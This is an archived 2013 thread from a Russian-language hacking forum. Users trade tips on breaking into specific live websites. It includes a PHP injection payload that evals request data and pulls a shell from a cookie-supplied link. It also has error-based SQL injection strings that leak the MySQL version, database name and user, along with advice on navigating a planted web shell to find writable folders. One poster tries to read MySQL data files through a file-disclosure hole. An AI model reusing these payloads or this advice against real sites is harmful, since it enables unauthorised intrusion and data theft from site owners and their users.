ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.03.2013, 18:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Sat-hacker
Sat-hacker said:
qaz
а чего ждать?
пока кто нибуть не зайдёт на сайт, как кто-то зайдёт домен запишется в log.txt
|
|
|
|
20.03.2013, 22:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
11733
Репутация:
0
|
|
Сообщение от DarkSorcerer
DarkSorcerer said:
Ищи директорию с правами на запись, хотя возможно там даже есть запись во всех директориях. Ты можешь ходить по каталогам из шелла что я тебе дал, используй GET запросы, копируй ссылку "на уровень вверх" например и подставляй переменную с параметрами из этой ссылки в адресной строке.
Выход был настолько прост, что я его и не заметил (с)
Благодарю! Добра тебе, милейший.
Господа, новая задача:
Код:
Code:
PHP 5.2.6-1+LENNY16
allow_url_fopen On
allow_url_include Off
file_uploads On
magic_quotes_gpc On
magic_quotes_runtime Off
magic_quotes_sybase Off
cURL On
Дыра всё та же - PHP inj в URL. /search?name={${eval(stripslashes($_GET[cmd]))}}&cmd=phpinfo(); не пашет, name={${eval(stripslahes(file_get_contents($_COOKI E[shell])))}}, где содержание печеньки "shell" = 'линк на шелл', тоже, точнее срабатывают MQ, кавычки экранируются и запрос ломается. Идеи?
|
|
|
|
20.03.2013, 22:52
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 1
Провел на форуме:
1034
Репутация:
0
|
|
Есть вопрос?
Вопрос такого плана:
на acunetix можно реализовать sql инъекцию такого вида:
?id=1'"or(ExtractValue(1,concat(0x3a,version())))= "1
ответ: syntax error: ':5.5.9-log'
ставлю в браузер, инъекции не видно.
Есть подозрения что кавычки не передаются должным образом или срабатывает защита
Как быть?
|
|
|
20.03.2013, 22:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
11733
Репутация:
0
|
|
Сообщение от Sanic1977
Sanic1977 said:
Вопрос такого плана:
на acunetix можно реализовать sql инъекцию такого вида:
?id=1'"or(ExtractValue(1,concat(0x3a,version())))= "1
ответ: syntax error: ':5.5.9-log'
ставлю в браузер, инъекции не видно.
Есть подозрения что кавычки не передаются должным образом
Как быть?
// Не верь мне, я - типичный скрипткидди.
Есть вероятность, что вся уязвимость построена на этой ошибке? 5.5.9, судя по всему, как раз таки и является версией MySQL. Попробуй database(), тогда уж и будет видно.
Либо просто включены magicquotes и, как я люблю писать, выход был настолько прост, что я его и не заметил (с)
|
|
|
|
20.03.2013, 23:11
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 1
Провел на форуме:
1034
Репутация:
0
|
|
Сообщение от rogatiy
rogatiy said:
// Не верь мне, я - типичный скрипткидди.
Есть вероятность, что вся уязвимость построена на этой ошибке? 5.5.9, судя по всему, как раз таки и является версией MySQL. Попробуй database(), тогда уж и будет видно.
Либо просто включены magicquotes и, как я люблю писать,
выход был настолько прост, что я его и не заметил
(с)
?id=1'"or(ExtractValue(1,concat(0x3a,database()))) ="1
пишет Column 'url' cannot be null
в браузере ошибок не видно
|
|
|
|
20.03.2013, 23:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
11733
Репутация:
0
|
|
Сообщение от Sanic1977
Sanic1977 said:
?id=1'"or(ExtractValue(1,concat(0x3a,database()))) ="1
пишет Column 'url' cannot be null
в браузере ошибок не видно
Тогда не представляю, это же Blind SQLi, что геморройно, во всяком случае для креветки-меня. А зачем двойные кавычки в запросе?
И вот ещё, покури.
|
|
|
|
20.03.2013, 23:22
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 1
Провел на форуме:
1034
Репутация:
0
|
|
Сообщение от rogatiy
rogatiy said:
Тогда не представляю, это же Blind SQLi, что геморройно, во всяком случае для креветки-меня. А зачем двойные кавычки в запросе?
только с двойными кавычками выводится инфа
на acunetix выодится ошибка, а firefox нет
смотрел через прокси что идет,там
acunetix -> ?id=1'"or(ExtractValue(1,concat(0x3a,version())))= "1
firefox -> ?id=1%27%22or(ExtractValue(1,concat(0x3a,user()))) =%221
может в этом?
из-за этого не могу автоматизировать
|
|
|
|
21.03.2013, 00:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
11733
Репутация:
0
|
|
Сообщение от Sanic1977
Sanic1977 said:
только с двойными кавычками выводится инфа
на acunetix выодится ошибка, а firefox нет
смотрел через прокси что идет,там
acunetix -> ?id=1'"or(ExtractValue(1,concat(0x3a,version())))= "1
firefox -> ?id=1%27%22or(ExtractValue(1,concat(0x3a,user()))) =%221
может в этом?
из-за этого не могу автоматизировать
Нет, %27, например, это ' в HTML и т.д.
Не в этом дело
|
|
|
|
21.03.2013, 00:16
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 1
Провел на форуме:
1034
Репутация:
0
|
|
Сообщение от rogatiy
rogatiy said:
Нет, %27, например, это ' в HTML и т.д.
Не в этом дело
там знак ' не играет роли без него можно обойтись просто стоит, инъекция через кавычки "
|
|
|
|
21.03.2013, 00:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
15180
Репутация:
0
|
|
Сообщение от qaz
qaz said:
никак
Спасибо, хоть и жаль, есть еще идея:
Как я уже говорил, есть раскрытие путей и могу читать файлы.
Вот часть запроса в одном из скриптов:
Код:
Code:
sql_query("SELECT id, pass, FROM users
В одном из скриптов есть строка:
Код:
Code:
$sql_name = "all";
Файл my.cnf содержит настройки:
Код:
Code:
basedir = /usr
datadir = /var/lib/mysql
Из чего делаю вывод, что в папке /var/lib/mysql/all лежит файл базы данных с именем users и неизвестным мне расширением, однако просмотр файлов, которым я располагаю, этот файл не показывает. Пробовал без расширения и с расширениями MYI, MYD, frm. Что еще можно попробовать? Может путь неверно указал???
Спасибо
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
